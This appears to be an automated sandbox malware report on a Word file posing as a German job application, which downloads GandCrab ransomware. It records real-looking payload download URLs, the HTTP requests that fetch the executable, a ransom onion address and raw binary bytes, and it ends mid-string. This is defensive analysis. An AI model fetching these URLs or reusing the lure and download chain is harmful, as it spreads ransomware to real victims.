Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report Sarah_Siedler_Bewerbungsunterlagen.doc

Overview

General Information

Joe Sandbox Version:25.0.0 Tiger's Eye
Analysis ID:821799
Start date:21.03.2019
Start time:13:59:55
Joe Sandbox Product:Cloud
Overall analysis duration:0h 7m 56s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Sarah_Siedler_Bewerbungsunterlagen.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.rans.spre.phis.spyw.expl.evad.winDOC@7/398@5/4
EGA Information:Failed
HDC Information:
  • Successful, ratio: 16.8% (good quality ratio 16.4%)
  • Quality average: 78.2%
  • Quality standard deviation: 24.3%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 104
  • Number of non-executed functions: 169
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Report size getting too big, too many NtWriteFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold1000 - 100Report FP / FNfalsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample does not show any behavior and checks for the installed Java version. Likely requires a different JRE version.
Sample is looking for USB drives. Launch the sample with the USB Fake Disk cookbook
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Replication Through Removable Media1PowerShell2Startup Items1Startup Items1Disabling Security Tools11Credential DumpingPeripheral Device Discovery11Taint Shared Content1Man in the Browser1Data Encrypted1Standard Cryptographic Protocol1
Replication Through Removable MediaScripting12Hidden Files and Directories1Process Injection1Scripting12Network SniffingSecurity Software Discovery31Replication Through Removable Media1Data from Local System11Exfiltration Over Other Network MediumStandard Non-Application Layer Protocol3
Drive-by CompromiseExploitation for Client Execution13Accessibility FeaturesPath InterceptionObfuscated Files or Information2Input CaptureFile and Directory Discovery1Windows Remote ManagementScreen Capture1Automated ExfiltrationStandard Application Layer Protocol13
Exploit Public-Facing ApplicationCommand-Line Interface1System FirmwareDLL Search Order HijackingHidden Files and Directories1Credentials in FilesSystem Information Discovery53Logon ScriptsInput CaptureData EncryptedConnection Proxy1
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessProcess Injection1Account ManipulationProcess Discovery2Shared WebrootData StagedScheduled TransferStandard Cryptographic Protocol
Spearphishing AttachmentGraphical User InterfaceModify Existing ServiceNew ServiceDLL Search Order HijackingBrute ForceRemote System Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used Port

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exeAvira URL Cloud: Label: malware
Source: http://sndtgo.ru/word.exeAvira URL Cloud: Label: malware
Antivirus detection for submitted fileShow sources
Source: Sarah_Siedler_Bewerbungsunterlagen.docAvira: Label: W97M/Dldr.Sload.dqyyh
Multi AV Scanner detection for submitted fileShow sources
Source: Sarah_Siedler_Bewerbungsunterlagen.docvirustotal: Detection: 47%Perma Link

Spreading:

barindex
Infects executable files (exe, dll, sys, html)Show sources
Source: C:\Windows\Temp\229.exeSystem file written: C:\Users\user\AppData\Roaming\.jre\Welcome.htmlJump to behavior
Checks for available system drives (often done to infect USB drives)Show sources
Source: C:\Windows\Temp\229.exeFile opened: z:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: x:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: v:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: t:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: r:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: p:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: n:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: l:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: j:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: h:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: f:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: b:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: y:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: w:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: u:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: s:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: q:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: o:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: m:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: k:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: i:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: g:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: e:Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
Source: C:\Windows\Temp\229.exeFile opened: a:Jump to behavior
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\Temp\229.exeCode function: 5_2_00408A8F lstrlenW,FindFirstFileExW,FindFirstFileW,FindNextFileW,CloseHandle,5_2_00408A8F
Source: C:\Windows\Temp\229.exeCode function: 5_2_0042C8FB FindFirstFileExW,5_2_0042C8FB
Source: C:\Windows\Temp\229.exeCode function: 5_1_0042C8FB FindFirstFileExW,5_1_0042C8FB

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exeJump to behavior
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: starstyl.ru
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49223 -> 92.53.98.31:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49223 -> 92.53.98.31:443

Networking:

barindex
Found Tor onion addressShow sources
Source: 229.exeString found in binary or memory: roject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/
Source: 229.exe, 00000005.00000002.1855736795.00413000.00000004.sdmpString found in binary or memory: | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/{USERID}
Source: 229.exe, 00000005.00000002.1859406137.069B0000.00000004.sdmpString found in binary or memory: | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/fa404de73c4e0000
Connects to country known for bullet proof hostersShow sources
Source: unknownNetwork traffic detected: IP: 90.156.201.98 Russian Federation
Source: unknownNetwork traffic detected: IP: 92.53.96.93 Russian Federation
Source: unknownNetwork traffic detected: IP: 92.53.98.31 Russian Federation
Source: unknownNetwork traffic detected: IP: 78.155.218.207 Russian Federation
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.2.1Date: Thu, 21 Mar 2019 13:01:22 GMTContent-Type: application/octet-streamContent-Length: 548352Last-Modified: Mon, 18 Mar 2019 17:47:26 GMTConnection: keep-aliveAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1b cc d3 bd 3e 03 9d 4e 2f 59 31 5a b9 af 94 d7 8c ca 5f c1 6a 74 e7 ae 14 1f 50 39 93 93 07 c7 c9 6b 11 c9 60 44 db 44 80 ec 64 e3 f4 9a 50 b7 d6 5d 3b b7 f4 9c 7e 0e 26 07 2a e9 a6 98 13 c0 45 f2 c5 a7 79 8e 51 1f bd 85 3a 0a a0 1b 7a 12 c1 8c b2 6e 21 dc 31 07 85 7e 3e 50 d9 94 1c e9 45 7e 3d 4c 9b 83 2c 9a de e6 ac 71 de be 8b b6 5b cd 4c de d0 cc 07 4c 22 9c 14 f4 d4 c7 0f f6 50 45 00 00 4c 0
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /assets/plugins/managermanager/widgets/colors/word.exe HTTP/1.1Host: prostor-rybalka.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /word.exe HTTP/1.1Host: sndtgo.ruConnection: Keep-Alive
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /assets/plugins/managermanager/widgets/colors/word.exe HTTP/1.1Host: prostor-rybalka.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /word.exe HTTP/1.1Host: sndtgo.ruConnection: Keep-Alive
Found strings which match to known social media urlsShow sources
Source: 229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmpString found in binary or memory: NC:uriTemplate="https://compose.mail.yahoo.com/?To=%s" /> equals www.yahoo.com (Yahoo)
Source: 229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmpString found in binary or memory: <NC:possibleApplication RDF:resource="urn:handler:web:https://compose.mail.yahoo.com/?To=%s"/> equals www.yahoo.com (Yahoo)
Source: 229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmpString found in binary or memory: <RDF:Description RDF:about="urn:handler:web:https://compose.mail.yahoo.com/?To=%s" equals www.yahoo.com (Yahoo)
Source: 229.exe, 00000005.00000003.1815845600.06FFE000.00000004.sdmpString found in binary or memory: yahoo.abouthome+ equals www.yahoo.com (Yahoo)
Source: 229.exe, 00000005.00000003.1815845600.06FFE000.00000004.sdmpString found in binary or memory: yahoo.contextmenu, equals www.yahoo.com (Yahoo)
Source: 229.exe, 00000005.00000003.1815845600.06FFE000.00000004.sdmpString found in binary or memory: yahoo.searchbar- equals www.yahoo.com (Yahoo)
Source: 229.exe, 00000005.00000003.1815845600.06FFE000.00000004.sdmpString found in binary or memory: yahoo.urlbar. equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: starstyl.ru
Urls found in memory or binary dataShow sources
Source: 229.exe, 00000005.00000003.1779457192.06F90000.00000004.sdmpString found in binary or memory: http://apache.org/xml/features/disallow-doctype-decl
Source: 229.exe, 00000005.00000003.1779457192.06F90000.00000004.sdmpString found in binary or memory: http://apache.org/xml/properties/xpointer-schema
Source: 229.exe, 00000005.00000003.1779457192.06F90000.00000004.sdmpString found in binary or memory: http://apache.org/xml/properties/xpointer-schema.
Source: 229.exe, 00000005.00000002.1860209799.06CA8000.00000004.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmpString found in binary or memory: http://casper.beckman.uiuc.edu/~c-tsai4
Source: 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmpString found in binary or memory: http://chasen.aist-nara.ac.jp/chasen/distribution.html
Source: 229.exe, 00000005.00000003.1808230416.06F94000.00000004.sdmpString found in binary or memory: http://clients1.google.com/ocsp0
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp, powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmpString found in binary or memory: http://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe
Source: powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmpString found in binary or memory: http://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exeH
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: http://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exet
Source: 229.exe, 00000005.00000002.1860209799.06CA8000.00000004.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmpString found in binary or memory: http://crl.geotrust.com/crls/secureca.crl0N
Source: 229.exe, 00000005.00000002.1860209799.06CA8000.00000004.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 229.exe, 00000005.00000002.1858172794.064A5000.00000004.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 229.exe, 00000005.00000003.1774155853.06F90000.00000004.sdmpString found in binary or memory: http://dl.javafx.com/javafx-cache.jnlp
Source: 229.exe, 00000005.00000003.1774155853.06F90000.00000004.sdmpString found in binary or memory: http://dl.javafx.com/javafx-rt.jnlp
Source: 229.exe, 00000005.00000003.1787687899.06F90000.00000004.sdmpString found in binary or memory: http://download.oracle.com/javase/7/docs/technotes/guides/plugin/
Source: 229.exe, 00000005.00000003.1808230416.06F94000.00000004.sdmpString found in binary or memory: http://g.symcb.com/crls/gtglobal.crl0
Source: 229.exe, 00000005.00000003.1808230416.06F94000.00000004.sdmpString found in binary or memory: http://g.symcd.com0
Source: 229.exe, 229.exe, 00000005.00000002.1855736795.00413000.00000004.sdmpString found in binary or memory: http://gandcrabmfe6mnef.onion/
Source: 229.exe, 00000005.00000002.1859406137.069B0000.00000004.sdmpString found in binary or memory: http://gandcrabmfe6mnef.onion/fa404de73c4e0000
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://hg.openjdk.java.net/jdk8u/jdk8u/jdk/file/tip/src/share/native/sun/security/ec/impl
Source: 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmpString found in binary or memory: http://hg.openjdk.java.net/openjfx/8u/rt
Source: 229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmpString found in binary or memory: http://home.netscape.com/NC-rdf#
Source: 229.exe, 00000005.00000002.1860209799.06CA8000.00000004.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: 229.exe, 00000005.00000003.1780112586.06F90000.00000004.sdmpString found in binary or memory: http://jax-ws.java.net/features/databinding
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmpString found in binary or memory: http://ocsp.digicert.com0K
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://ocsp.digicert.com0N
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://ocsp.digicert.com0O
Source: 229.exe, 00000005.00000003.1782525967.06F90000.00000004.sdmpString found in binary or memory: http://ocsp.example.net:80
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://ocsp.thawte.com0
Source: 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmpString found in binary or memory: http://opensource.org/licenses/bsd-license.php
Source: 229.exe, 00000005.00000003.1808230416.06F94000.00000004.sdmpString found in binary or memory: http://pki.google.com/GIAG2.crl0
Source: 229.exe, 00000005.00000003.1808230416.06F94000.00000004.sdmpString found in binary or memory: http://pki.google.com/GIAG2.crt0
Source: powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmpString found in binary or memory: http://prostor-rybalka.ru/assets/plugins/managermH
Source: powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmpString found in binary or memory: http://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: http://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exeH
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: http://prostor-rybalka.ruH
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: http://prostor-rybalka.ruh%
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://relaxngcc.sf.net/).
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 229.exe, 00000005.00000003.1808230416.06F94000.00000004.sdmpString found in binary or memory: http://s2.symcb.com0
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmpString found in binary or memory: http://s2.symcb.com0k
Source: 229.exe, 00000005.00000003.1780112586.06F90000.00000004.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/http
Source: powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmpString found in binary or memory: http://sndtgo.ru/word.exe
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: http://sndtgo.ru/word.exeH
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmpString found in binary or memory: http://sndtgo.ruH
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmpString found in binary or memory: http://sndtgo.ruh%
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://tartarus.org/~martin/PorterStemmer
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://th.symcb.com/th.crl0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://th.symcb.com/th.crt0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://th.symcd.com0&
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://upx.sourceforge.net/upx-license.html.
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://upx.tsx.org
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://wildsau.idv.uni-linz.ac.at/mfx/upx.html
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://www.apache.org/).
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://www.apache.org/licenses/
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://www.ecma-international.org
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://www.ecma-international.org/memento/codeofconduct.htm
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://www.freebxml.org/
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://www.freebxml.org/).
Source: 229.exe, 00000005.00000003.1777533617.06F90000.00000004.sdmpString found in binary or memory: http://www.ietf.org/rfc/rfc2373.txt)
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://www.linuxnet.com
Source: 229.exe, 00000005.00000003.1817847507.0706E000.00000004.sdmp, 229.exe, 00000005.00000003.1817870133.07077000.00000004.sdmpString found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/0-1469516994468
Source: 229.exe, 00000005.00000003.1817847507.0706E000.00000004.sdmp, 229.exe, 00000005.00000003.1817870133.07077000.00000004.sdmpString found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/1-1469516994468
Source: 229.exe, 00000005.00000003.1817847507.0706E000.00000004.sdmp, 229.exe, 00000005.00000003.1817870133.07077000.00000004.sdmpString found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/2-1469516994469
Source: 229.exe, 00000005.00000003.1817847507.0706E000.00000004.sdmp, 229.exe, 00000005.00000003.1817870133.07077000.00000004.sdmpString found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/3-1469516994470
Source: 229.exe, 00000005.00000003.1807771526.06F90000.00000004.sdmpString found in binary or memory: http://www.mozilla.org/2006/addons-blocklist
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://www.nexus.hu/upx
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://www.oracle.com/goto/opensourcecode/request
Source: 229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmpString found in binary or memory: http://www.oracle.com/hotspot/jdk/
Source: 229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmpString found in binary or memory: http://www.oracle.com/hotspot/jfr-info/
Source: 229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmpString found in binary or memory: http://www.oracle.com/hotspot/jvm/
Source: 229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmpString found in binary or memory: http://www.oracle.com/hotspot/jvm/enable-errors
Source: 229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmpString found in binary or memory: http://www.oracle.com/hotspot/jvm/enable-exceptions
Source: 229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmpString found in binary or memory: http://www.oracle.com/hotspot/jvm/file-io-threshold
Source: 229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmpString found in binary or memory: http://www.oracle.com/hotspot/jvm/socket-io-threshold
Source: 229.exe, 00000005.00000003.1787687899.06F90000.00000004.sdmpString found in binary or memory: http://www.oracle.com/technetwork/java/javase/overview/
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmpString found in binary or memory: http://www.symauth.com/cps0(
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmpString found in binary or memory: http://www.symauth.com/rpa0)
Source: 229.exe, 00000005.00000003.1808230416.06F94000.00000004.sdmpString found in binary or memory: http://www.symauth.com/rpa00
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp, 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmpString found in binary or memory: http://www.unicode.org/Public/
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp, 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmpString found in binary or memory: http://www.unicode.org/Public/.
Source: 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmpString found in binary or memory: http://www.unicode.org/cldr/data/.
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://www.unicode.org/copyright.html.
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp, 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmpString found in binary or memory: http://www.unicode.org/reports/
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmpString found in binary or memory: http://www.xfree86.org/)
Source: 229.exe, 00000005.00000003.1779457192.06F90000.00000004.sdmpString found in binary or memory: http://xml.apache.org/xalan-j
Source: 229.exe, 00000005.00000003.1780112586.06F90000.00000004.sdmpString found in binary or memory: http://xmlns.oracle.com/webservices/jaxws-databinding
Source: 229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmpString found in binary or memory: https://30boxes.com/external/widget?refer=ff&amp;url=%s
Source: 229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmpString found in binary or memory: https://compose.mail.yahoo.com/?To=%s
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://cp.masterhost.ru/
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmp, 229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BE8B71F2A
Source: 229.exe, 00000005.00000003.1810529389.06F90000.00000004.sdmpString found in binary or memory: https://hg.m
